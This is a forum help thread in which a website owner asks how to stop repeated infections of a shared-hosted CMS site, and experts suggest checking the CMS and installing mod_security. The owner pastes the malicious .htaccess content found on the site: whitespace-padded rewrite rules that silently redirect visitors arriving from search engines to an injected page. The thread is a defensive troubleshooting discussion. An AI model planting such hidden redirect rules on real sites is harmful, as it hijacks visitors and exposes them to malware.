We help IT Professionals succeed at work.

We've partnered with Certified Experts, Carl Webster and Richard Faulkner, to bring you two Citrix podcasts. Learn about 2020 trends and get answers to your biggest Citrix questions!Listen Now

x

Website infected with virus - keeps coming back

Medium Priority
1,117 Views
Last Modified: 2013-11-22
Hi,

A contact needs some assistance with a website. It just keeps getting infected with a virus.
The website is:


www.philcampbellmusic.co.uk

(WARNING virus at time of writing on aboe website which will be brough down in the next few hours and reset - make sure you have anti virus software on your PC before clickling link above)

Whenever we clean it up they soon seem to reinfect it with a virus again. We even took down the administrattion for the CMS that allowed us to edit the content and of cours tried changing various passwords.

The website is hosted by fasthosts (linux package - mysql db). Is there some weakness in their system which could be making this worse / easier for the culprits to gain access?

Thanks
Comment
Watch Question

Top Expert 2009
Commented:
HI,
if the website hosted on linux, then i would not say surely that its been affected by virus

it could be , someone upload some script on the server via your cms or your server has been compromized

can you just explain, whats make you thinks its been effected by virus ??

did any one tell you ??

also is this shared hosting or vps hosting??

Not the solution you were looking for? Getting a personalized solution is easy.

Ask the Experts

Author

Commented:
if you visit the website running anti virus software and Internet explorer (say try it with AVG) then you will see what occurs. In fact I have attached a screen shot.

Also if you google Phil Campbell and then click the first result, you are actually redirected to another website.

I can fix it in the short term, but how can I stop this from re-occuring?


ExampleCapture.JPG
Top Expert 2009
Commented:
Ok from my pc, i am getting Troj/JSRedir-D for script call .js

if you look at the picture you will see
its taking /admin/inages/check.js as virus

its thinking js script as virus

like one of my webiste, i had a simple javascrpt, and those antivirus would not allow to view that page because of javascript


cleaning virus on the pc would not make any different, and also, there is no virus on the server, its the script you need to check, there is somehing on the script that its not allowed by antivirus

virusscript.GIF

Author

Commented:
It is a script virus but that's the problem. It actually tries to compromise with vistiors PC. Fasthosts even closed us down for not sorting it out for a period of time.
Also the problem at esent does not occur in firefox. Only IE and the flash does not play properly.

Top Expert 2009
Commented:
its the CMS you are using, I would of say the Bugs in that CMS,

do you have any check.js file in /admin/imagesehi/check.js  file ??

Commented:
Hi,

Can you rename both files and upload them here please ?



A Symantec Certified Specialist @ your service

Author

Commented:
I will upload them ASAP. they are always the files that get changed and they are full of someone else's code.

Unfortunltaty the original creators of the website have washed their hands of the website a bit which is frustrating.

Thanks.

Author

Commented:
I'm stugling to upload the two infected files right now. But please find the contents of the .htaccess file (in code box)
It uses  a lot of empty space so when you first open it it looks like an empty.

Also I now have written instructions on how I fix the problem. But it is always not long before it comes back. The guide is:

1) Deleted the ehi folder in
/htdocs/admin/images/

2) Replaced the two files
flashEmbed.js
pageSwitch.js
With non infected versions.

3) Open for editing and deleted all the content in the .htaccess file in the root folder.

If I run these three steps the website is back to normal. But how do I find and close whatever hole is letting whoever in?




      # a0b4df006e02184c60dbf503e71c87ad                                                                                                                                                      
                                                                                                                                                      RewriteEngine On                                                                                                                                                      
                                                                                                                                                      RewriteCond %{HTTP_REFERER} ^http://([a-z0-9_\-]+\.)*(google|msn|yahoo|live|ask|dogpile|mywebsearch|yandex|rambler|aport|mail|gogo|poisk|alltheweb|fireball|freenet|abacho|wanadoo|free|club-internet|aliceadsl|alice|skynet|terra|ya|orange|clix|terravista|gratis-ting|suomi24)\. [NC]                                                                                                                                                      
                                                                                                                                                      RewriteCond %{HTTP_REFERER}  [?&](q|query|qs|searchfor|search_for|w|p|r|key|keywords|search_string|search_word|buscar|text|words|su|qt|rdata)\=                                                                                                                                                      
                                                                                                                                                      RewriteCond %{HTTP_REFERER} ![?&](q|query|qs|searchfor|search_for|w|p|r|key|keywords|search_string|search_word|buscar|text|words|su|qt|rdata)\=[^&]+(%3A|%22)                                                                                                                                                      
                                                                                                                                                      RewriteCond %{TIME_SEC} <59                                                                                                                                                      
                                                                                                                                                      RewriteRule ^.*$ /admin/images/ehi/ex3/t.htm [L]                                                                                                                                                      
                                                                                                                                                      # a995d2cc661fa72452472e9554b5520c                               

Open in new window

Author

Commented:
So any ideas on this? At present virus not present as cleaned it up again but I know sooner or later it will rear its head again. Be nice to close whatever hole is open.

Thanks
Commented:
Additional Countermeasures:

Please check the following articles for additional countermeasures:

http://25yearsofprogramming.com/blog/20071223.htm

http://25yearsofprogramming.com/blog/20070705.htm

http://thedesignspace.net/MT2archives/000505.html

Check your website for any infected pages:

http://www.unmaskparasites.com/


To secure your website(s), it's recommended to install Apache Mod_security:

http://www.modsecurity.org/projects/modsecurity/apache/index.html

http://www.onlamp.com/pub/a/apache/2003/11/26/mod_security.html

http://www.howtoforge.com/apache_mod_security

http://www.linuxjournal.com/article/8708


A Symantec Certified Specialist @ your service

Author

Commented:
I will check out some of these links but also add that don't forget I'm using a shared host so I doubt I would be able to make changes to the Apache installaion?
Do you think the webhost themselves (Fasthost) play some part in the weak security?
Commented:
Hi,

Yes, you should ask them on how to add/enable mod_security for apache. Otherwise, change the hosting provider. If they can't protect, it's the time for an upgrade.

Check the following providers + guides:

http://litespeedtech.com/solutions/webhosting/

http://blog.eukhost.com/webhosting/how-to-install-mod_security-for-apache/

http://www.sharkspace.com/helpcenter/index.php?_m=knowledgebase&_a=viewarticle&kbarticleid=88&nav=0,22


A Symantec Certified Specialist @ your service
Still ok since fixing last attack but I'm sure an attack is imminent. I will close this tad for now however.

Thanks

Author

Commented:
note I thought I had still awarded points for this question but if this has not happened let me know. but I beleive I have awarded points and acceptedown summary answer.

Thanks
Access more of Experts Exchange with a free account
Thanks for using Experts Exchange.

Create a free account to continue.

Limited access with a free account allows you to:

  • View three pieces of content (articles, solutions, posts, and videos)
  • Ask the experts questions (counted toward content limit)
  • Customize your dashboard and profile

*This site is protected by reCAPTCHA and the Google Privacy Policy and Terms of Service apply.

OR

Please enter a first name

Please enter a last name

8+ characters (letters, numbers, and a symbol)

By clicking, you agree to the Terms of Use and Privacy Policy.